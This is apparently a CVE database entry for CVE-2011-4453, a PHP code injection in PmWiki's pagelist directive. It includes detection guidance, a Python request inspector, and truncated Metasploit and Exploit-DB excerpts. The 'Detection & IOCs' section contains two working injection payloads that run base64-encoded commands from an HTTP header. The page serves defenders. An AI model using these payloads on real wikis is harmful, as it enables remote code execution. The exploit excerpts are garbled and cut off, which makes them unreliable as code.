CVE-2011-4453
Published 2011-12-22
Priority P2 · 66 · high · CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 53.41% (98.9th percentile)
The PageListSort function in scripts/pagelist.php in PmWiki 2.x before 2.2.35 allows remote attackers to execute arbitrary code via PHP sequences in a crafted order parameter in a pagelist directive, leading to unintended use of the PHP create_function function.
Affected
76 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pmwiki | pmwiki | — | — |
Detection & IOCs (extracted from sources)
command: action=edit&post=save&n=Cmd.Shell&text=(:pagelist order=']);error_reporting(0);passthru(base64_decode($_SERVER[HTTP_CMD]));print(___);die;#:)
command: (:pagelist order=']);error_reporting(0);eval(base64_decode($_SERVER[HTTP_#{header}]));die;#:)
- Detect POST requests to pmwiki.php containing a 'pagelist order=' directive with PHP injection sequences (e.g., ']);, error_reporting, passthru, eval, base64_decode) in the 'text' or 'order' parameter.
- Alert on HTTP requests to pmwiki.php with a custom HTTP header (e.g., 'Cmd:') carrying base64-encoded OS commands, used to pass commands to the injected passthru/eval payload via $_SERVER[HTTP_CMD].
- Flag POST requests to pmwiki.php with action=edit&post=save and a 'text' body containing '(:pagelist order=' followed by PHP code sequences such as ']);error_reporting(0);.
- Monitor for the version fingerprint request to pmwiki.php?n=PmWiki.Version, which is used by the Metasploit module to check if the target is running a vulnerable version (pmwiki-2.0.0 to 2.2.34).
- Exploitation may require authentication if the wiki is not configured for public write access; unauthenticated exploitation is only possible on publicly writable PmWiki instances.
- The vulnerability affects PmWiki versions 2.0.0 through 2.2.34; version 2.2.35 and later are patched.
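The detection notes above, written as a request inspector. This is an added example, not code from the page or from any of the listed sources; `inspect`, the finding labels, the `COMMON_HEADERS` allow-list and the sample requests are assumptions made for illustration. The header check is a name-independent heuristic, because the second command string above uses a variable header name rather than a fixed `Cmd`.

```python
import base64, binascii, re
from urllib.parse import unquote_plus, urlsplit

# Value of any order= argument, ending at the directive close ":)", "&" or end of input.
ORDER_VALUE = re.compile(r"\border=(.*?)(?::\)|&|$)", re.I | re.S)
# Sequences named in the detection notes; a legitimate order value is a
# comma-separated list of sort keys and contains none of them.
PHP_MARKERS = re.compile(r"'\]\)|error_reporting|passthru|eval\s*\(|base64_decode|\$_SERVER", re.I)
COMMON_HEADERS = {"host", "user-agent", "accept", "cookie", "referer",
                  "connection", "content-type", "content-length"}

def carries_base64_text(value):
    """True if value is strict base64 that decodes to printable ASCII."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return bool(raw) and raw.isascii() and raw.decode("ascii").isprintable()

def inspect(url, headers, body=""):
    """Return the findings for one request to pmwiki.php (empty list if clean)."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("pmwiki.php"):
        return []
    findings = []
    decoded = unquote_plus(parts.query + "&" + body)
    if any(PHP_MARKERS.search(m.group(1)) for m in ORDER_VALUE.finditer(decoded)):
        findings.append("php-in-order")
    if any(k.lower() not in COMMON_HEADERS and carries_base64_text(v)
           for k, v in headers.items()):
        findings.append("base64-in-custom-header")
    if re.search(r"(?:^|&)n=PmWiki\.Version(?:&|$)", decoded, re.I):
        findings.append("version-fingerprint")
    return findings

# Constructed sample requests; the first body is the IOC string listed above.
SAMPLES = [
    ("/pmwiki.php", {"Host": "wiki.example", "Cmd": "aWQ="},
     "action=edit&post=save&n=Cmd.Shell&text=(:pagelist order=']);error_reporting(0);"
     "passthru(base64_decode($_SERVER[HTTP_CMD]));print(___);die;#:)"),
    ("/pmwiki.php?n=PmWiki.Version", {"Host": "wiki.example"}, ""),
    ("/pmwiki.php", {"Host": "wiki.example"},
     "action=edit&post=save&n=Main.Index&text=(:pagelist group=Main order=-time:)"),
]

if __name__ == "__main__":
    for url, headers, body in SAMPLES:
        print(url, inspect(url, headers, body))
```

The version-fingerprint finding is informational on its own, since ordinary visitors also load that page; it is most useful when correlated with a later `php-in-order` hit from the same client.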
Exploit-DB
PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (2) (Metasploit)
exploitdb · 2011-12-14
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'PmWiki %q{
This module exploits an arbitrary command execution vulnerability
in PmWiki from 2.0.0 to 2.2.34. The vulnerable function is
inside /scripts/pagelist.php.
},
'License' => MSF_LICENSE,
'Author' =>
[
'EgiX', # Vulnerability discovery and exploit
'TecR0c' # Metasploit Module
],
'References' =>
[
['CVE', '2011-4453'],
['BID', '50776'],
['OSVDB', '77261'],
['URL', 'http://www.exploit-db.com/exploits/18149/'],
['URL', '
Exploit-DB
PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (1)
exploitdb · 2011-11-23
---
$r) {
454. if (@$PageListSortCmp[$o])
455. $code .= "\$c = {$PageListSortCmp[$o]}; ";
456. else
457. $code .= "\$c = @strcasecmp(\$PCache[\$x]['$o'],\$PCache[\$y]['$o']); ";
458. $code .= "if (\$c) return $r\$c;\n";
459. }
460. StopWatch('PageListSort sort');
461. if ($code)
462. uasort($list,
463. create_function('$x,$y', "global \$PCache; $code return 0;"));
464. StopWatch('PageListSort end');
Input passed through 'order' parameter of 'pagelist' directive isn't properly sanitized before being used
in a call to create_function() at line 463. This can be exploited to inject and execute arbitrary PHP code.
Successful exploitation of this vulnerability might require authentication if the wiki isn't public writable.
[-] Disclosu
Metasploit
PmWiki pagelist.php Remote PHP Code Injection Exploit
metasploit
This module exploits an arbitrary command execution vulnerability in PmWiki from 2.0.0 to 2.2.34. The vulnerable function is inside /scripts/pagelist.php.
Published 2011-12-22